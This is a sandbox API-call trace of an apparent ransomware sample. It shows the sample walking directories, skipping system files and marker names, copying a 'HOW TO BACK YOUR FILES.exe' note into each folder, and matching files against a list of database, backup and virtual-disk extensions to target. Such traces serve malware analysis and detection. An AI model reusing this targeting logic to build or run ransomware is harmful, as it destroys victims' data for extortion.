ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.945] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.946] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.946] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.946] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.946] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.946] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0077.946] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0077.946] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.946] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c20b3e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0077.946] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0077.946] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0077.946] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0077.946] lstrlenW (lpString="packages") returned 8 [0077.946] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*") returned 85 [0077.946] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="packages" | out: lpString1="packages") returned="packages" [0077.946] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0077.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x318fc8 [0077.947] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23e8 | out: ListHead=0x2e7710, ListEntry=0x2d23e8) returned 0x2d2568 [0077.947] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0077.947] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0077.947] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d23e8 [0077.947] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0077.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0077.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0077.947] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned 92 [0077.947] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0077.947] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.947] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0077.948] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.948] GetLastError () returned 0x20 [0077.948] Sleep (dwMilliseconds=0xc8) [0078.152] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0078.155] GetLastError () returned 0x0 [0078.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.155] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.159] CloseHandle (hObject=0x120) returned 1 [0078.159] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.159] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.159] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.159] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.159] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.159] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0078.159] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c20b3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.159] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.159] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.159] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0078.159] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0078.160] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c20b3e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c20b3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0078.160] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0078.160] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="aoldtz.exe") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="windows") returned -1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="bootmgr") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="temp") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="pagefile.sys") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="boot") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="ids.txt") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="ntuser.dat") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="perflogs") returned 1 [0078.160] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="MSBuild") returned 1 [0078.160] lstrlenW (lpString="vcRuntimeAdditional_x86") returned 23 [0078.160] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*") returned 94 [0078.160] lstrcpyW (in: lpString1=0x2cce4ba, lpString2="vcRuntimeAdditional_x86" | out: lpString1="vcRuntimeAdditional_x86") returned="vcRuntimeAdditional_x86" [0078.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0078.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xea) returned 0x2c8eb8 [0078.160] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2568 [0078.160] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0078.160] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0078.160] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2388 [0078.160] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0078.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0078.160] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0078.160] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned 116 [0078.160] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0078.160] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.160] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.161] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0078.161] GetLastError () returned 0x0 [0078.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.161] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.161] CloseHandle (hObject=0x120) returned 1 [0078.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.161] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.161] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.162] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.162] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.162] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0078.162] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.162] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.162] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0078.162] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0078.162] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0078.162] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c0e500, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd3c0e500, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd3c0e500, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x4f699e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0078.162] lstrlenW (lpString="cab1.cab") returned 8 [0078.162] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*") returned 118 [0078.162] lstrcpyW (in: lpString1=0x2cce4ea, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0078.162] lstrlenW (lpString="cab1.cab") returned 8 [0078.162] lstrlenW (lpString="Ares865") returned 7 [0078.162] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0078.162] lstrlenW (lpString=".dll") returned 4 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0078.162] lstrlenW (lpString=".lnk") returned 4 [0078.162] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0078.162] lstrlenW (lpString=".ini") returned 4 [0078.163] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0078.163] lstrlenW (lpString=".sys") returned 4 [0078.163] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0078.163] lstrlenW (lpString="cab1.cab") returned 8 [0078.163] lstrlenW (lpString="bak") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0078.163] lstrlenW (lpString="ba_") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0078.163] lstrlenW (lpString="dbb") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0078.163] lstrlenW (lpString="vmdk") returned 4 [0078.163] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0078.163] lstrlenW (lpString="rar") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0078.163] lstrlenW (lpString="zip") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0078.163] lstrlenW (lpString="tgz") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0078.163] lstrlenW (lpString="vbox") returned 4 [0078.163] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0078.163] lstrlenW (lpString="vdi") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0078.163] lstrlenW (lpString="vhd") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0078.163] lstrlenW (lpString="vhdx") returned 4 [0078.163] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0078.163] lstrlenW (lpString="avhd") returned 4 [0078.163] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0078.163] lstrlenW (lpString="db") returned 2 [0078.163] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0078.163] lstrlenW (lpString="db2") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0078.163] lstrlenW (lpString="db3") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0078.163] lstrlenW (lpString="dbf") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0078.163] lstrlenW (lpString="mdf") returned 3 [0078.163] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0078.163] lstrlenW (lpString="mdb") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0078.164] lstrlenW (lpString="sql") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0078.164] lstrlenW (lpString="sqlite") returned 6 [0078.164] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0078.164] lstrlenW (lpString="sqlite3") returned 7 [0078.164] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0078.164] lstrlenW (lpString="sqlitedb") returned 8 [0078.164] lstrlenW (lpString="xml") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0078.164] lstrlenW (lpString="$er") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0078.164] lstrlenW (lpString="4dd") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0078.164] lstrlenW (lpString="4dl") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0078.164] lstrlenW (lpString="^^^") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0078.164] lstrlenW (lpString="abs") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0078.164] lstrlenW (lpString="abx") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0078.164] lstrlenW (lpString="accdb") returned 5 [0078.164] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0078.164] lstrlenW (lpString="accdc") returned 5 [0078.164] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0078.164] lstrlenW (lpString="accde") returned 5 [0078.164] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0078.164] lstrlenW (lpString="accdr") returned 5 [0078.164] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0078.164] lstrlenW (lpString="accdt") returned 5 [0078.164] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0078.164] lstrlenW (lpString="accdw") returned 5 [0078.164] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0078.164] lstrlenW (lpString="accft") returned 5 [0078.164] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0078.164] lstrlenW (lpString="adb") returned 3 [0078.164] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0078.165] lstrlenW (lpString="adb") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0078.165] lstrlenW (lpString="ade") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0078.165] lstrlenW (lpString="adf") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0078.165] lstrlenW (lpString="adn") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0078.165] lstrlenW (lpString="adp") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0078.165] lstrlenW (lpString="alf") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0078.165] lstrlenW (lpString="ask") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0078.165] lstrlenW (lpString="btr") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0078.165] lstrlenW (lpString="cat") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0078.165] lstrlenW (lpString="cdb") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0078.165] lstrlenW (lpString="ckp") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 